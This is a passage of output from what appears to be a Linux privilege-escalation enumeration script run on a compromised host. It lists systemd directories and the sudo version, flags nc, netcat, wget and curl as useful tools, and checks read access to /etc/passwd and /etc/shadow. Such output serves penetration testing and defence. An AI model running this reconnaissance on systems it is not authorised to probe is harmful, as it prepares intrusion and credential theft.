1239. lrwxrwxrwx 1 root root 24 Oct 12 2017 console-setup.service -> ../console-setup.service
1240. lrwxrwxrwx 1 root root 25 Oct 12 2017 keyboard-setup.service -> ../keyboard-setup.service
1241. lrwxrwxrwx 1 root root 19 Oct 12 2017 setvtrgb.service -> ../setvtrgb.service
1242.  
1243. /lib/systemd/system/sockets.target.wants:
1244. total 28K
1245. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
1246. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
1247. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-initctl.socket -> ../systemd-initctl.socket
1248. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
1249. lrwxrwxrwx 1 root root 34 Mar 8 2018 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
1250. lrwxrwxrwx 1 root root 26 Mar 8 2018 systemd-journald.socket -> ../systemd-journald.socket
1251. lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket
1252.  
1253. /lib/systemd/system/busnames.target.wants:
1254. total 0
1255.  
1256. /lib/systemd/system/getty.target.wants:
1257. total 4.0K
1258. lrwxrwxrwx 1 root root 23 Mar 8 2018 getty-static.service -> ../getty-static.service
1259.  
1260. /lib/systemd/system/graphical.target.wants:
1261. total 4.0K
1262. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
1263.  
1264. /lib/systemd/system/local-fs.target.wants:
1265. total 4.0K
1266. lrwxrwxrwx 1 root root 29 Mar 8 2018 systemd-remount-fs.service -> ../systemd-remount-fs.service
1267.  
1268. /lib/systemd/system/rc-local.service.d:
1269. total 4.0K
1270. -rw-r--r-- 1 root root 290 Feb 21 2018 debian.conf
1271.  
1272. /lib/systemd/system/rescue.target.wants:
1273. total 4.0K
1274. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
1275.  
1276. /lib/systemd/system/resolvconf.service.wants:
1277. total 4.0K
1278. lrwxrwxrwx 1 root root 42 Mar 8 2018 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path
1279.  
1280. /lib/systemd/system/sigpwr.target.wants:
1281. total 4.0K
1282. lrwxrwxrwx 1 root root 36 Mar 8 2018 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service
1283.  
1284. /lib/systemd/system/systemd-resolved.service.d:
1285. total 4.0K
1286. -rw-r--r-- 1 root root 200 Feb 21 2018 resolvconf.conf
1287.  
1288. /lib/systemd/system/systemd-timesyncd.service.d:
1289. total 4.0K
1290. -rw-r--r-- 1 root root 251 Feb 21 2018 disable-with-time-daemon.conf
1291.  
1292. /lib/systemd/system/timers.target.wants:
1293. total 4.0K
1294. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer
1295.  
1296. /lib/systemd/system/runlevel1.target.wants:
1297. total 0
1298.  
1299. /lib/systemd/system/runlevel2.target.wants:
1300. total 0
1301.  
1302. /lib/systemd/system/runlevel3.target.wants:
1303. total 0
1304.  
1305. /lib/systemd/system/runlevel4.target.wants:
1306. total 0
1307.  
1308. /lib/systemd/system/runlevel5.target.wants:
1309. total 0
1310.  
1311. /lib/systemd/system-generators:
1312. total 708K
1313. -rwxr-xr-x 1 root root 19K May 17 2018 snapd-generator
1314. -rwxr-xr-x 1 root root 4.8K Apr 3 2018 cloud-init-generator
1315. -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-cryptsetup-generator
1316. -rwxr-xr-x 1 root root 59K Mar 8 2018 systemd-dbus1-generator
1317. -rwxr-xr-x 1 root root 43K Mar 8 2018 systemd-debug-generator
1318. -rwxr-xr-x 1 root root 79K Mar 8 2018 systemd-fstab-generator
1319. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-getty-generator
1320. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-hibernate-resume-generator
1321. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-insserv-generator
1322. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-rc-local-generator
1323. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-system-update-generator
1324. -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-sysv-generator
1325. -rwxr-xr-x 1 root root 119K Mar 8 2018 systemd-gpt-auto-generator
1326. -rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator
1327.  
1328. /lib/systemd/system-shutdown:
1329. total 4.0K
1330. -rwxr-xr-x 1 root root 160 Nov 8 2017 mdadm.shutdown
1331.  
1332. /lib/systemd/system-sleep:
1333. total 4.0K
1334. -rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm
1335.  
1336. /lib/systemd/network:
1337. total 12K
1338. -rw-r--r-- 1 root root 404 Mar 8 2018 80-container-host0.network
1339. -rw-r--r-- 1 root root 482 Mar 8 2018 80-container-ve.network
1340. -rw-r--r-- 1 root root 80 Mar 8 2018 99-default.link
1341.  
1342. /lib/systemd/system-preset:
1343. total 4.0K
1344. -rw-r--r-- 1 root root 869 Mar 8 2018 90-systemd.preset
1345.  
1346.  
1347. ### SOFTWARE #############################################
1348. [-] Sudo version:
1349. Sudo version 1.8.16
1350.  
1351.  
1352. ### INTERESTING FILES ####################################
1353. [-] Useful file locations:
1354. /bin/nc
1355. /bin/netcat
1356. /usr/bin/wget
1357. /usr/bin/curl
1358.  
1359.  
1360. [-] Can we read/write sensitive files:
1361. -rw-r--r-- 1 root root 1684 Jul 1 2018 /etc/passwd
1362. -rw-r--r-- 1 root root 820 Jul 1 2018 /etc/group
1363. -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
1364. -rw-r----- 1 root shadow 1100 Jan 7 21:14 /etc/shadow
1365.  
1366.  
1367. [-] Can't search *.conf files as no keyword was entered
1368.  
1369. [-] Can't search *.php files as no keyword was entered
1370.  
1371. [-] Can't search *.log files as no keyword was entered
1372.  
1373. [-] Can't search *.ini files as no keyword was entered
1374.  
1375. [-] All *.conf files in /etc (recursive 1 level):
1376. -rw-r--r-- 1 root root 3028 Jun 22 2018 /etc/adduser.conf
1377. -rw-r--r-- 1 root root 6488 Jun 22 2018 /etc/ca-certificates.conf
1378. -rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
1379. -rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
1380. -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
1381. -rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
1382. -rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
1383. -rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
1384. -rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
1385. -rw-r--r-- 1 root root 110 Jun 22 2018 /etc/kernel-img.conf
1386. -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
1387. -rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf
1388. -rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
1389. -rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
1390. -rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
1391. -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
1392. -rw-r--r-- 1 root root 6920 Jan 11 2018 /etc/overlayroot.conf
1393. -rw-r--r-- 1 root root 112 Jun 22 2018 /etc/overlayroot.local.conf
1394. -rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
1395. -rw-r--r-- 1 root root 0 Jun 22 2018 /etc/popularity-contest.conf
1396. -rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf
1397. -rw-r--r-- 1 root root 100 Apr 11 2017 /etc/sos.conf
1398. -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
1399. -rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
1400. -rw-r--r-- 1 root root 2148 Jul 2 2018 /etc/sysctl.conf
1401.  
1402.  
1403. [-] Any interesting mail in /var/mail:
1404. total 0
1405. drwxrwsr-x 1 root mail 0 Jun 22 2018 .
1406. drwxr-xr-x 1 root root 108 Jun 22 2018 ..